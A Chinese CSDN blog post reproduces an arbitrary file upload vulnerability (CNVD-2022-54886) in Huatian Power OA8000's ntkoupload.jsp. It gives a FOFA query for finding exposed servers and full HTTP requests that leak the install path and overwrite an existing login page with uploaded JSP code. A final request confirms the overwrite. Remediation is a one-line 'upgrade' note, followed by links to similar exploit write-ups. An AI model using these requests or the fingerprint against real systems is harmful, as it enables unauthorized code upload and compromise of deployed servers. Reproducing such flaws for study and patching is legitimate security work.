华天动力OA8000 ntkoupload.jsp 任意文件上传漏洞[CNVD-2022-54886]复现

已于 2023-12-21 10:43:36 修改
阅读量1.4k 收藏 8
点赞数 6
文章标签: 网络安全 网络 安全
于 2023-12-21 10:39:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53733257/article/details/135123187
版权

目录

前言

一、漏洞环境

二、复现步骤

1、获取htoa/的绝对路径

2、上传文件,写入内容

3、验证

三、修复建议

前言

本文只是照猫画虎,其真实的漏洞利用原理我还不清楚。

参考文章:【漏洞复现】天OA存在任意文件上传漏洞-CSDN博客

一、漏洞环境

fofa:body="/OAapp/WebObjects/OAapp.woa" || body="/OAapp/htpages/app"

二、复现步骤

1、获取htoa/的绝对路径

POST /OAapp/jsp/upload.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5Ur8laykKAWws2QO
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 293

------WebKitFormBoundary5Ur8laykKAWws2QO
Content-Disposition: form-data; name="file"; filename="xxx.xml"
Content-Type: image/png

real path
------WebKitFormBoundary5Ur8laykKAWws2QO
Content-Disposition: form-data; name="filename"

xxx.png
------WebKitFormBoundary5Ur8laykKAWws2QO--

如图,得到htoa/路径在D:/下。

2、上传文件,写入内容

POST /OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzRSYXfFlXqk6btQm
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 411

------WebKitFormBoundaryzRSYXfFlXqk6btQm
Content-Disposition: form-data; name="EDITFILE"; filename="xxx.txt"
Content-Type: image/png

<%out.print("yyyyyyyyyyyyyyyyyyyyyyyyyyyy");%>
------WebKitFormBoundaryzRSYXfFlXqk6btQm
Content-Disposition: form-data; name="newFileName"

D:/htoa/Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp
------WebKitFormBoundaryzRSYXfFlXqk6btQm--

这里有一点疑惑就是貌似只能上传normalLoginPageForOther.jsp,试过test.jsp,未成功,不清楚是normalLoginPageForOther.jsp本来就有只是修改了它的内容还是别的什么原因。

3、验证

访问normalLoginPageForOther.jsp。看内容是否与上传时传入的相同。

GET /OAapp/htpages/app/module/login/normalLoginPageForOther.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

如图,表示成功。

三、修复建议

升级至最新版。

sheepyeah
关注
漏洞复现华天动力-OA-ntkoupload-文件上传
知黑而守白
01-11 298
华天动力OA是一个以技术领先著称的协同软件产品,拥有领先业界的三大核心技术:协同平台、工作流和智能报表,是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品,也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品。华天动力OA系统中的 ntkoupload 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
华天OA任意文件上传漏洞 复现
薛定谔嘚喵博客
10-09 718
华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。该OA系统存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器的敏感信息。
华天动力OA办公系统存在未授权访问漏洞(新)-漏洞挖掘
weixin_43167326的博客
01-20 971
华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。华天动力OA存在未授权访问漏洞,攻击者可以读取用户信息,读取敏感信息等,利用。请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。
华天动力OA TemplateService 任意文件读取漏洞复现
0xSec
12-28 1594
华天动力OA TemplateService接口处存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
漏洞复现华天动力OA TemplateService接口处存在任意文件读取漏洞
https://blog.echo234.cn/
03-30 817
华天软件有限公司(简称“华天动力”)是国内首批专注于独立OA协同软件研发、为政企提供垂直专业、数智化转型解决方案的科技创新型企业。华天动力OA TemplateService 接口处存在任意文件读取漏洞,攻击者可以利用此漏洞获取系统敏感信息。
华天动力OA downloadWpsFile接口处任意文件读取漏洞复现 [附POC]
最新发布
薛定谔嘚喵博客
07-26 248
华天动力OA downloadWpsFile接口处存在任意 文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
做自己喜欢的事,并将其发挥到极致!
05-10 3224
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微新一代移动办公平台E-Cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件,实体签章的方式,泛微OA E-Cology平台browser.jsp处存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
漏洞复现】泛微OA E-Cology LoginSSO.jsp SQL注入漏洞
alert['Hello World']
07-22 885
泛微OA E-Cology LoginSSO.jsp 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。
万户OA downloadhttp任意文件下载漏洞复现 CNVD-2016-06898
afei001
01-03 1064
万户OA是集协同软件、门户网站、ERP、CRM、HR、财务、电子邮件、视频会议的功能的一种综合性办公系统。该产品存在任意文件下载漏洞,攻击者可利用漏洞下载服务器系统任意文件,获取系统敏感信息,造成敏感信息泄露。
泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
Ms08067安全实验室
12-14 6160
文章来源|MS08067 Web安全知识星球本文作者:Taoing(Web漏洞挖掘班讲师)参考:https://cnvd.org.cn/flaw/show/CNVD-2021-49104 ...
致远互联-OA前台fileUpload.do存在任意文件上传(含批量验证poc)
weixin_43567873的博客
04-28 375
致远互联-OA前台fileUpload.do存在任意文件上传(含批量验证poc)
华天动力-OA8000 MyHttpServlet 文件上传漏洞复现
0xSec
11-29 1746
华天动力OAMyHttpServlet存在任意文件上传漏洞,未经身份认证的攻击者可上传恶意的raq文件并执行raq文件中的任意sql语句,获取用户账号密码等敏感信息。
华天动力OA ntkoFile接口任意文件读取漏洞
weixin_43167326的博客
02-02 279
华天动力OA是一个以技术领先著称的协同软件产品,拥有领先业界的三大核心技术:协同平台、工作流和智能报表,是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品,也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品。请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。或点击链接关注渗透安全HackTwo回复"完整1day POC及漏洞利用,
复现】用友u8CRM 文件读取漏洞
fushuang333的博客
12-28 838
复现】用友u8CRM 文件读取漏洞。用友U8CRM 是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。
复现华天动力OA办公系统 任意文件读取漏洞_62
fushuang333的博客
03-02 1369
复现华天动力OA办公系统 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容。
华天动力OA ntkodownload.jsp 任意文件读取漏洞(含批量验证poc)
weixin_43567873的博客
04-07 218
华天动力OA ntkodownload.jsp 任意文件读取漏洞(含批量验证poc)
(1day)华天动力oa-TemplateService-任意文件读取漏洞
weixin_43167326的博客
01-22 427
华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。华天动力OA存在未授权访问漏洞,攻击者可以读取用户信息,读取敏感信息等,利用。
漏洞复现华天动力-OA-hrapplicationformservice-信息泄露
知黑而守白
01-11 474
华天动力OA是一个以技术领先著称的协同软件产品,拥有领先业界的三大核心技术:协同平台、工作流和智能报表,是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品,也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品。华天动力OA系统中的hrApplicationFormService接口存在一个任意文件读取漏洞,攻击者可以通过构造恶意请求,利用该漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。攻击者可能通过利用此漏洞获取敏感信息,导致潜在的信息泄漏风险。
漏洞复现华天动力-OA-TemplateService-任意文件读取
知黑而守白
01-11 251
华天动力OA是一个以技术领先著称的协同软件产品,拥有领先业界的三大核心技术:协同平台、工作流和智能报表,是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品,也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品。华天动力-OA系统中的 ntkodownload 接口存在文件读取漏洞。攻击者可以通过发送特定的POST请求,利用该漏洞获取系统敏感文件。
CVE-2016-2183: OpenSSL 信息泄露漏洞 CT-45065,CVE-2016-2183,CNVD-2016-06765,CNNVD-201608-448,95568
09-07
CVE-2016-2183是指OpenSSL的信息泄露漏洞。具体的CVE编号是CT-45065,CVE-2016-2183,CNVD-2016-06765,CNNVD-201608-448,95568。关于该漏洞的更多详细信息可以参考以下链接:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2183。 该漏洞的修复处理通常包括升级OpenSSL版本。升级的原因可能是因为服务器被扫描出存在OpenSSH漏洞,例如OpenSSH用户枚举漏洞CNVD-2018-20962)(CVE-2018-15919)、OpenSSH设计漏洞(CVE-2017-15906)和OpenSSH <7.5等。此外,还可以开启telnet登录来增强安全性。 在修复过程中,可能会遇到报错信息"no matching cipher found: client aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se server chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com"。可以参考附录中的openssl相关信息来解决该问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值